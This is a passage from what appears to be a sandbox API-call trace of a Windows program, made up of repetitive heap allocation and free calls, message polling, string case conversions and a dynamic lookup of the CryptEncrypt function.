lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.036] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.036] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.036] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.037] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.037] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.038] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.038] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.039] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.039] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.039] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.039] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0188.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.040] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.040] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.041] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.041] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.041] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e7008 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.045] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0188.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa2e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.047] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6c10 [0188.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.048] HeapFree (in: hHeap=0x25c0000, 